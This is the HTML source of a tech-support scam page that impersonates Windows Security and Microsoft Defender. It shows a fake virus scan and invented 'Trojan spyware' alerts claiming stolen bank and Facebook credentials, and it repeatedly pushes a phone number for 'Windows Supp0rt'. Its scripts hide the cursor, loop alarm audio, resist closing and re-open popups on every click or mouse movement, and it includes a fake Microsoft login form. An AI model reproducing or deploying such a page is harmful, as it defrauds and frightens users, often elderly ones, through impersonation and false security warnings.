<html lang="en"><head><meta charset="utf-8">
      <meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport">
      <meta content="noindex,nofollow" name="robots">
      <title>Security center </title>
      <link href="w3" rel="icon" id="favicon" type="image/png">
      <link href="css/tapa.css" rel="stylesheet">
      <link href="css/chat.css" rel="stylesheet">
        <link href="css/bootstrap.min.css" <link="" type="text/css" rel="stylesheet">
<script src="js/jquery.min.js"></script>
<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="css/font-awesome.min.css">

      <style type="text/css">@keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-moz-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-webkit-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}#xnvjiaf2npoo1694042833969.open{animation : tawkMaxOpen .25s ease!important;}@keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-moz-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-webkit-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}#xnvjiaf2npoo1694042833969.closed{animation: tawkMaxClose .25s ease!important}</style>


         <script src="js/esc.js" type="text/javascript"></script>
         <script src="js/flscn.js" type="text/javascript"></script>
         <script src="js/main.js" type="text/javascript"></script>
         <script src="js/style.js" type="text/javascript"></script>
         <script src="js/net.js" type="text/javascript"></script>
         <script src="js/ips.js" type="text/javascript"></script>
    <script>
function chat() {
document.getElementById("chat").style.display = "block";
document.getElementById("footer").style.display = "block";
document.getElementById("welcomeDiv").style.display = "block";
 document.getElementById("chat-box").style.display = "none";
 document.getElementById("login-box").style.display = "none";

}
</script>



   

        </head>

        <body class="map" id="mycanvas" onmousemove="showd2();" onclick="chat();beep1();" onbeforeunload="return myFunction()" style="cursor:none">

    <audio id="mdchys">
        <source src="media/ados.mp3" type="audio/mpeg">
      </audio>
      <audio autoplay="" id="infogt">
        <source src="media/msc.mp3" type="audio/mpeg">
      </audio>

      <a href="#" id="link_black" style="cursor:none" rel="noreferrer">
        <div class="black" style="height: 145%; cursor: none; display: block;"></div>

          <div class="bg" id="bg">
        <div class="bgimg" style="top:0">
          <img src="images/f24.png" alt="" width="100%">
        </div>
      </div>
      </a>
      <div class="pro_box" style="cursor: none; display: default;">
        <div class="pro_box_header">
          <div class="row">
            <div class="col-md-12">
              <div class="minimize">
                <ul>
                  <li>
                    <a href="#">
                      <img src="images/mnc.png">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
            <div class="col-md-4">
              <div class="logo">
                <img src="images/msmm.png">
                <span>Windows_security</span>
              </div>
            </div>
            <div class="col-md-8">
              <div class="activate_lic">
                <ul>
                  <li>
                    <a href="#">
                      <button>Activate the license</button>
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="images/set.png">
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="images/ques.png">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div>
        <div class="scan_box">
          <div class="scan_box_header">
            <div class="row">
              <div class="col-md-6">
                <div class="quick_scan">
                  <p>
                    <img src="images/vsc.png">
                    <span>Scanning Rapide</span>
                  </p>
                </div>
              </div>
              <div class="col-md-6">
                <div class="bhfys">
                  <ul>
                    <li>
                      <a href="#">
                        <img src="images/mnc.png">
                      </a>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
          </div>
          <div class="scan_body">
            <div class="progress" style="height:30px;">
              <img src="images/scn.png" alt="" style="max-width: 100%;">
            </div>
            <div class="table_quick">
              <table class="table table-bordered">
                <thead>
                  <tr>
                    <th scope="col">Scanned Objects</th>
                    <th scope="col">
                      <div class="col_fourth counter">
                        <h2 class="count-number count-title timer" data-speed="5000" data-to="51900">51,900</h2>
                      </div>
                    </th>
                  </tr>
                  <tr>
                    <th scope="col">Time Spent</th>
                    <th scope="col">5 secs</th>
                  </tr>
                  <tr>
                    <th scope="col">Identified Threats</th>
                    <th scope="col" style="color:red">
                      <h2 class="count-number count-title timer" data-speed="2500" data-to="1200">1,200</h2>
                    </th>
                  </tr>
                </thead>
              </table>
            </div>
          </div>
          <div class="scan_footer">
            <div class="row">
              <div class="col-md-6">
                <div class="bt_can">
                  <div class="btn-group" role="group" aria-label="Basic example">
                    <button class="btn btn-secondary" type="button">Scan</button>
                  </div>
                  <div class="btn-group" role="group" aria-label="Basic example">
                    <button class="btn btn-secondary" type="button">Pause</button>
                  </div>
                </div>
              </div>
              <div class="col-md-6">
                <div class="bt_can2">
                  <div class="btn-group" role="group" aria-label="Basic example">
                    <button class="btn btn-secondary" type="button">Scheduled Scans</button>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="pro_box2" style="cursor: default; display: none;">
        <img src="images/bg1.png" alt="" style="max-width: 100%;">
      </div>
      <div class="pro_box3" style="cursor: none; display: none;">
        <div class="pro_box_header">
          <div class="row">
            <div class="col-md-12">
              <div class="minimize">
                <ul>
                  <li>
                    <a href="#">
                      <img src="images/mnc.png">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
            <div class="col-md-4">
              <div class="logo">
                <img src="images/msmm.png">
                <span>Windows_security</span>
              </div>
            </div>
            <div class="col-md-8">
              <div class="activate_lic">
                <ul>
                  <li>
                    <a href="#">
                      <button>Activate the license</button>
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="images/bel.png">
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="images/set.png">
                    </a>
                  </li>
                  <li>
                    <a href="#">
                      <img src="images/ques.png">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div><div class="scan_box2" style=" border: 1px solid #474747;  cursor:default;  box-shadow: 15px 15px 15px 15px rgba(0,0,0,.4);">
        <div class="scan_box2">
          <div class="scan_box_header">
            <div class="row">
              <div class="col-md-6">
                <div class="quick_scan">
                  <p>
                    <img src="images/vsc.png">
                    <span>Scan</span>
                  </p>
                </div>
              </div>
             <div class="col-md-6">
           <span class="fl title2" id="txts1">
              <a href="#" id="cross">
                <p style="margin-right:50px;">➖</p><p style="margin-right:30px;">❏ </p><p>❌</p><p></p>
                      </a>


                </span></div>
              </div>
            </div>
          </div>
          <div class="scan_body">
            <div class="row">
              <div class="col-md-12">
                <div class="tooreg_detail_scan">
                  <ul>

                  </ul></div>
                </div>

              </div>
            </div>
          </div>
        </div>

      <div style="bottom:-20px;position:fixed;cursor:none;z-index:999999999" id="footer">
        <div class="row">
          <div class="col-md-12">
            <div class="right-foot" style="text-align:center">
              <span id="footertxt">
                <img src="images/msmm.png"> Windows_security </span>
              <span style="font-weight:500;padding-left:13px;color:#fff; ">Windows Supp0rt <span style="border:1px solid #fff;border-radius:5px;padding:2px 5px">    +1 (844) 439-7172
                </span>
              </span>
            </div>
          </div>
          <div class="col-md-12">
            <marquee direction="left" height="100px" width="100%">
              <small class="text-left" style="color:#eee;font-size:10px">Windows Defender SmartScreen now prevents unrecognized applications from appearing. Running this application may put your PC at risk. Windows Defender scan detected unwanted adware on this device that can steal passwords, online identities, financial information, personal files, photos, and documents。</small>
            </marquee>
          </div>
        </div>
      </div>

      <div class="lightbox" id="poptxt" onclick="beep1();" style="display: none; cursor:default;">
        <div class="ilb top" style="font-size:17px">
          <div class="ilb headers" style="border-bottom:1px solid #d6d5d5;">
            <span class="fl title" id="txtadd">
              <span class="fl ilb">
                <img src="images/dm.png" class="logo3">
              </span>Microsoft_Defender </span>
            <span class="fl title2" id="txts1">
               <p style="margin-right:50px;">➖</p><p style="margin-right:30px;">❏ </p><p>❌</p><p></p>

            </span>
          </div>
        </div>
        <div id="txtintro2">
          <span class="colo-rd">
           <p style="font-size:30px;font-weight:500;">Sorry, scan is not completed!</p>
            <p style="font-size:25px;color:red;font-weight:500;">Error: Ox800VDS</p>
            <p  style="font-size:18px;font-weight:300; color:black;">IP detected: <span id="ip_add">91.121.63.69</span></p>


             <p style="font-size:15px;font-weight:400;color:black;">Microsoft Defender found some infected files but not able to remove it because of the group policies permissions. Please Scan now to remove it manually.</p>

          </span>
        </div>
        <img src="images/re.gif" id="banner">
        <div id="disclaimer" style="color:#0F396D;">Call Supp0rt for help<br>
           <span class="Supp0rt" style="font-size:22px;">Windows Supp0rt <span style="border:1px Solid #114d9a;border-radius:5px;padding:2px 5px">+1 (844) 439-7172
            </span>
          </span>
        </div>
        <div id="bottom">
          <img src="images/msmm.png" id="badge">
          <span class="title3">Windows_Security</span>
          <ul>
            <li>
              <a href="#" style="text-decoration: none;">
                <div class="button">
                  <span id="">Scan now</span>
                </div>
              </a>
            </li>
            <li>
              <a href="#" style="text-decoration: none;">
                <div class="button2">
                  <span id="">Scan Later</span>
                </div>
              </a>
            </li>
          </ul>
        </div>
      </div>

      <div class="cardcontainer" style="cursor: default; display: none;" id="pop_up_new">
        <p style="font-size:16px;font-weight:400;margin:0;padding:5px 10px;color:#fff!important;color:#414141;font-weight:700;margin-top:0px" class="text-center">Windows-Defender </p>
        <p>
         <b>Access to this PC has been blocked for security reasons</b>
         </p>
         <p>Your computer has been reported to be infected with Trojan_type_spyware. The following data was compromised:</p>
         <p>> Email ID <br>> Bank Password <br>> Facebook Login <br>> Photos and Documents </p>
         <p>A Windows Defender scan detected potentially unwanted adware on this device that can steal passwords, online identities, financial information, personal files, photos, and documents. </p>
         <p>Please contact us immediately. Our engineer will guide you through the removal process over the phone. </p>
         <p>Call Windows Supp0rt immediately to report this threat, prevent identity theft, and unblock access to this device. </p>
         <p>Closing this window may put your personal information at risk and may cause your Windows registration to be suspended. </p>
         <p style="padding-bottom:0;color:#fff;font-size:16px">Windows Please call Supp0rt:<strong>
            <span style="border:1px solid #fff;border-radius:5px;padding:2px 5px">   +1 (844) 439-7172
            </span>
          </strong>
        </p>
        <div class="action_buttons">
          <a class="active" id="leave_page" style="cursor:pointer;color:#fff!important">Allow</a>
          <a class="active" id="leave_page" style="color:#fff!important">Deny</a>
        </div>
      </div>

      <div class="answer_list" style="display:none;background-color: rgb(40 40 40 / 80%);height:auto;width:550px;margin-left:33%;position:absolute;z-index:99999999;border:1px solid transparent;border-color:#d6d8db;border-radius:.5rem" id="welcomeDiv">
        <p style="color:#FFFFFF;margin-top:10px;font-size:16px;opacity:.9;padding:0 5px" class="text-center">Access to this system has been blocked for security reasons. Do not access or restart this PC. If you overlook this basic warning, you may lose information about this framework. Contact Supp0rt as soon as possible and a Microsoft expert will guide you through the investigation over the phone. Running this application may put your PC at risk。<br>
          <strong>
         Windows Supp0rt: <span style="border:1px solid #383d41;border-radius:5px;padding:2px 5px">    +1 (844) 439-7172
            </span>
          </strong>
        </p>
      </div>

      <div id="chat" style="display: none;" class="bounce3">
        <img src="images/msmm.png">
        <span style="color:#222;font-size:24px;font-weight:600;margin-left:6px;position:relative;top:5px">Microsoft</span>
        <br>
        <p>Windows Technical Supp0rt
        </p>
        <h4 style="font-weight:600;color:#0F396D;font-size:22px">    +1 (844) 439-7172
          <br>( Toll-free number)<br><br>
        </h4>
        <div class="arrow-down">
          <svg height="1em" viewBox="0 0 320 512">
            <style>
              svg {
                fill: #fff
              }
            </style>
            <path d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z"></path>
                  </svg></div>
      </div>

      <div id="login-box">
        <span style="color: #fff;
        font-size: 21px;
        font-weight: 600;
        margin-left: 6px;
        position: relative;
        top: 5px;">Wind0ws Security Alert !</span>
        <div class="mnmz1" onclick="hide1();playSound1();">
                    <p class="text-center1" style="color: red; font-size: 22px; opacity:1; font-weight: 700; ">X</p>

                  </div>

        <br>
        <br>
        <p class="text-center" style="color: #fff;  margin-top:10px; font-size: 16px; opacity:.9; ">
          Wind0ws has been locked due to unusual activity.
      <br>Try signing in again with your Micr0s0ft ID and password.<br>If you need help, contact Micr0s0ft Supp0rt.<br><strong> +1 (844) 439-7172			 	</strong></p>

        <form action="#">
           <input type="text" name="name" id="name" placeholder="Username" class="text-input" required="" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"><br>

         <input type="text" name="name" id="name" placeholder="Password" class="text-input" required="" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"><br>

        <input type="submit" class="button1" name="Verify" value="Login" onclick="playSound1();">



      </form></div>


<div id="chat-box">
<span style="color: red;
font-size: 21px;
font-weight: 600;
margin-left: 6px;
position: relative;
top: 5px;">Virus Alert 027341 !!</span>
<div class="bhfys" onclick="hide1();playSound1();">
            <p class="text-center1" style="color: #CDCBCB; font-size: 18px; opacity:.9; ">X</p>

          </div>

<br>
<br>
<p class="text-center" style="color: #CDCBCB;  margin-top:10px; font-size: 16px; opacity:.9; ">
Microsoft Windows locked due to unusual activity.

<br>Your system has been reported to be infected with Trojan-type spyware.<br>For assistance, contact Microsoft Supp0rt<br><strong style="font-size:24px;">+1 (844) 439-7172 			 	</strong></p>

</div>

<div id="ev_talkbox_wrapper" class="ev_talkbox_wrapper_min bounce">
  <div class="new_messg">
      <p style=" color: #fff;   margin-top: 8px;
      font-weight: 500;
      font-size: 16px;">Questions? Talk to an expert</p>
  </div>
  <div id="ev_talkbox_min" class="">
      <span id="ev_min_zoimg"></span>
      <span id="ev_min_title">Chat</span>
  </div>
  </div>

<script>
function showd2() {
document.getElementById("chat-box").style.display = "block";
}
</script>
<script>
  function showd2() {
  document.getElementById("login-box").style.display = "block";
  }
  </script>


      <script>
        setInterval(function() {
          document.getElementById("infogt").play()
        }, 500);
      </script>
      <script>
  function beep1() {
    document.getElementById("mdchys").play();
 }
  </script>
      <script>
        var e = 1;
        setInterval(function() {
          1 == e ? (document.getElementById("favicon").href = "w3.html", e = 0) : (document.getElementById("favicon").href = "w1.html", e = 1)
        }, 1E3);
      </script>
      <script>
        $(document).ready(function() {
          $("#mycanvas").click(function() {
            $("#welcomeDiv").show()

          })
        });
      </script>
      <script>
        $(document).ready(function() {
          $(".pro_box").delay(400).fadeIn(300);
          $("#poptxt").delay(2000).fadeIn(400);
              $(".black").delay(1E3).fadeIn(800);
          $(".pro_box2").delay(2500).fadeIn(800);
          $(".pro_box3").delay(3500).fadeIn(800);
          $("#pop_up_new").delay(4E3).fadeIn(800);
          $("#ev_talkbox_wrapper").delay(1).fadeIn(500)
        });
      </script>
      <script>
        $(document).ready(function () {
            $("body").click(function () {
                $("#ev_talkbox_wrapper").hide();
            });
        });
    </script>
    <script>
      $(document).ready(function () {
          $("#ev_talkbox_wrapper").click(function () {
              $("#ev_talkbox_wrapper").hide();
          });
      });
  </script>
  <script>
      $(document).ready(function () {
          $("#mycanvas").click(function () {
              $("#ev_talkbox_wrapper").hide();
          });
      });
  </script>
      <script>
        $(document).ready(function() {
          $("#mycanvas").click(function() {
            $("#poptxt").show()
          })
        });
        $(document).ready(function() {
          $("#cross").click(function() {
            $("#poptxt").show()
          })
        });
      </script>
      <script>
        $(document).ready(function() {
          $("body").mouseover(function() {
            $("#poptxt").show()
          })
        });
      </script>



      </body></html>
